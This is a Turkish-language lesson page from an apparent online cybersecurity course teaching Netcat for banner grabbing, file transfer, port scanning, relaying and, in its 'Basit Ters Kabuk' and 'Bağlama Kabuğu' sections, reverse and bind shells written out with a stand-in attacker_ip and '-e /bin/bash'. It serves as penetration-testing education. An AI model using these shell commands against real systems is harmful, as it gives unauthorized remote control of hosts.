0Pricing
Cyber Security Academy · Ders

Netcat: İsviçre Çakısı

Banner bilgileri, dosya aktarımı, bağlantı noktası yönlendirme ve basit ters kabuklar için nc kullanın.

Netcat: İsviçre Çakısı, CoddyKit'te ücretsiz bir Cyber Security Academy dersidir. Bu, 4 dersinin 3. dersidir. Aşağıdan dersin tamamını ücretsiz okuyabilir, sonra tarayıcıda yerleşik kod editörü ve 7/24 yapay zeka koçu ile uygulamalı olarak pratik yapabilirsin. Bu, Cyber Security Academy öğrenme yolunun bir parçasıdır ve ilerlemeniz web ve CoddyKit uygulaması arasında senkronize olur. Cyber Security Academy kursu toplamda 4 dersten oluşur.

Netcat Nedir

Netcat (nc), TCP veya UDP kullanarak ağ bağlantıları üzerinden veri okuyan ve yazan bir yardımcı programdır. Neredeyse tüm Unix sistemlerinde kurulu olarak bulunur; hata ayıklama, dosya aktarımı ve temel istismar için çok değerlidir.

Temel Bağlantı ve Servis Başlığı Bilgisi Edinme

Servis başlığını almak ve protokolle elle etkileşim kurmak için herhangi bir TCP bağlantı noktasına bağlanın. Bu, keşfin en basit biçimidir.

# Connect to port 80
nc 192.168.1.100 80
GET / HTTP/1.0
[Enter twice]

# Connect to SMTP
nc mail.example.com 25
# Returns: 220 mail.example.com ESMTP

Bir Bağlantı Noktasını Dinleme

Netcat, -l -p ile gelen bağlantıları dinleyebilir. Bu özellik bağlantıyı test etmek, ters kabukları yakalamak ve dosya almak için kullanışlıdır.

# Listen on port 4444
nc -lvnp 4444

# -l listen
# -v verbose
# -n no DNS resolution
# -p port number

Netcat ile Dosya Aktarımı

Netcat, dosyaları bir bağlantıya yönlendirerek gönderebilir. Alıcı dinler ve çıktıyı bir dosyaya yönlendirir. Şifreleme yoktur — yalnızca güvenilir ağlarda kullanın.

# Receiver (runs first):
nc -lvnp 4444 > received_file.txt

# Sender:
nc 192.168.1.10 4444 < file_to_send.txt

Netcat ile Bağlantı Noktası Taraması

Netcat, -z (sıfır giriş/çıkış modu) ve -w (zaman aşımı) seçenekleriyle temel bağlantı noktası taraması yapabilir. Nmap'ten daha yavaştır; ancak Nmap kullanılamadığında işe yarar.

# Scan ports 20-80
nc -zv 192.168.1.100 20-80 2>&1 | grep succeeded

# With timeout:
nc -zvw2 192.168.1.100 22 80 443

Basit Ters Kabuk

Ters kabuk, hedefin saldırgana geri bağlanmasını sağlar. Güvenlik duvarı kurallarının hedefe gelen bağlantıları engellediği sızma testlerinde kullanışlıdır.

# Attacker listens:
nc -lvnp 4444

# Target executes (bash):
bash -i >& /dev/tcp/attacker_ip/4444 0>&1

# Or via nc:
nc attacker_ip 4444 -e /bin/bash

Bağlama Kabuğu

Bağlama kabuğu hedef makinede dinleme yapar. Saldırgan buna bağlanır. Güvenlik duvarları genellikle gelen bağlantıları engellediği için modern sızma testlerinde daha az kullanılır.

# On target: listen and serve a shell
nc -lvnp 5555 -e /bin/bash

# On attacker: connect
nc target_ip 5555

UDP Modu

UDP bağlantıları için -u kullanın. DNS (53 numaralı bağlantı noktası) ve SNMP (161 numaralı bağlantı noktası) gibi UDP hizmetlerini test etmek için kullanışlıdır.

# Test DNS over UDP
nc -u 8.8.8.8 53

# Test SNMP
nc -u 192.168.1.1 161

Netcat ile Vekil Oluşturma

Netcat, ağlar arasında geçiş yapmak için bağlantıları zincirleyebilir. Adlandırılmış kanallarla (mkfifo) birlikte kullanıldığında, ek araçlar olmadan basit çift yönlü tüneller oluşturur.

mkfifo /tmp/pipe
nc -lvnp 4445 < /tmp/pipe | nc internal_host 80 > /tmp/pipe

Ncat: Modern Alternatif

Ncat (Nmap'in parçasıdır), Netcat'i SSL desteği (--ssl), erişim denetimi ve aracı moduyla genişletir. Şifrelenmiş kanallar için Ncat'i tercih edin.

# SSL listener
ncat --ssl -lvnp 4444

# SSL connect
ncat --ssl target_ip 4444

Savunmacılar: Netcat'i Tespit Etme

Netcat bağlantıları normal TCP bağlantıları gibi görünür. Savunmacılar bunu işlem adı izleme (HIDS), olağandışı dışa giden bağlantı noktaları ve beklenmeyen üst işlemlerden başlatılan kabuklar aracılığıyla tespit eder.

Kısa Test

Hangi Netcat seçeneği dinleme modunu etkinleştirir?

Özet: Netcat

Netcat temel bir araçtır: servis başlığı bilgisi edinmek, dosya aktarmak, bağlantıyı test etmek ve ters/bağlama kabuğu mekaniklerini anlamak için kullanın. Yetkili sızma testlerinde güvenlik duvarı kurallarını doğrular ve saldırganın ağ içinde sıçramasını simüle eder. Hem kullanmak hem de tespit etmek için onu iyi tanıyın.

Sıkça Sorulan Sorular

“Netcat: İsviçre Çakısı” dersi ücretsiz mi?

Evet — “Netcat: İsviçre Çakısı” dersin tüm metni burada web'de ücretsiz olarak okunabilir. Etkileşimli olarak pratik yapmak (yerleşik kod editörü ve 7/24 yapay zeka koçu) ve Cyber Security Academy kursunun geri kalanını açmak için CoddyKit PRO'ya yükselt. Cyber Security Academy kursu toplamda 4 dersten oluşur.

“Netcat: İsviçre Çakısı” dersinde ne öğreneceğim?

Banner bilgileri, dosya aktarımı, bağlantı noktası yönlendirme ve basit ters kabuklar için nc kullanın. Cyber Security Academy ile uygulamalı kodu tarayıcıda doğrudan çalıştırarak pratik yaparsın ve 7/24 yapay zeka koçu dersi çalışırken sorularını yanıtlar.

Cyber Security Academy öğrenmeye başlamak için deneyim gerekli mi?

Önceden deneyim gerekmez. CoddyKit'te Cyber Security Academy, başlangıçtan ileri seviyeye kadar yapılandırıldığı için buradan başlayabilir veya başından başlayıp kendi hızında ilerleme yapabilirsin. Bu, 4 dersinin 3. dersidir.

“Netcat: İsviçre Çakısı” dersi ne kadar sürer?

Çoğu CoddyKit dersi yaklaşık 5–10 dakika sürer. Her biri kısa ve etkileşimli olduğu için sabit ilerleme yaparsın ve web ile uygulama arasında tam olarak bıraktığın yerden devam edebilirsin.

Bu Cyber Security Academy dersinde kod yazıp çalıştırabilir miyim?

Evet. Her Cyber Security Academy dersi yerleşik bir kod editörü içerir, bu sayede tarayıcıda gerçek kod yazıp çalıştırabilir ve anlık yapay zeka geri bildirimi alırsın — yerel kurulum gerekli değildir.

Bu kursun tüm dersleri

  1. Nmap Bağlantı Noktası Tarama Teknikleri
  2. Hizmet ve OS Parmak İzi Belirleme
  3. Netcat: İsviçre Çakısı
  4. Ağ Numaralandırma Betikleri
← Cyber Security Academy Sayfasına Dön